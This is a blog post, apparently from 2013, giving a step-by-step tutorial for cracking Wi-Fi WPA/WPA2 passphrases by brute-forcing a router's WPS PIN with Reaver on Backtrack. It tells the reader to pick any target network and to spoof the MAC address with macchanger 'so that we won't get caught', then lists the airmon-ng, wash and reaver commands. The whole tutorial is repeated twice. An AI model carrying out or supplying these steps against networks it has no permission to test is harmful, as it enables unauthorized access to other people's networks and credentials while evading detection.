Cracking wifi Password using Backtrack


WPA/WPA2 password can be cracked simply by capturing WPA handshake and then applying a dictionary attack on them. If he passphrase is in the dictionary then password will be cracked, and this process may take hours, in some cases in even days. But what if password is not in dictionary?

So here we will learn to crack these passpharses

WPS:- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless

home network. By default this is enabled in most of routers.

Using Reaver we will brute force the AP's WPS, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers

are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which

can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.

The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in

11,000 attempts.So here key concept is that we can brute-force that pin, and can get all the credentials kept for Access Point which can be any combination of

digits, special symbols

Let's Start :

Boot your Backtrack :

Let's we will change the mac address of our network card so that we won't get caught

airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Now run the following the command to get all the available AP's

wash -1 mon0

Now choose your target and note its bssid and issue the following command replacing <bssid> with the targets bssid:

reaver -i mon0 -b <bssid> -vv

Now wait until you Reaver brute force's the pin. Once its done, you'll have

WPS Pin
WPA PSK
AP SSID

Photo: As promised :D

Cracking Non-Dictionary WPA/WPA2 Passpharse

WPA/WPA2 password can be cracked simply by capturing WPA handshake and then applying a dictionary attack on them. If he passphrase is in the dictionary then password will be cracked, and this process may take hours, in some cases in even days. But what if password is not in dictionary?

So here we will learn to crack these passpharses

WPS:- Wi-Fi Protected Setup (WPS; originally Wi-Fi Simple Config) is a computing standard that attempts to allow easy establishment of a secure wireless

home network. By default this is enabled in most of routers.

Using Reaver we will brute force the AP's WPS, attempting every possible combination in order to guess the AP's 8 digit pin number. Since the pin numbers

are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which

can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values.

The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually.
Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in

11,000 attempts.So here key concept is that we can brute-force that pin, and can get all the credentials kept for Access Point which can be any combination of

digits, special symbols

Let's Start :

Boot your Backtrack :

Let's we will change the mac address of our network card so that we won't get caught

airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Now run the following the command to get all the available AP's

wash -1 mon0

Now choose your target and note its bssid and issue the following command replacing <bssid> with the targets bssid:

reaver -i mon0 -b <bssid> -vv

Now wait until you Reaver brute force's the pin. Once its done, you'll have

WPS Pin
WPA PSK
AP SSID

0 comments:

Copyright © 2013 Link4Networking.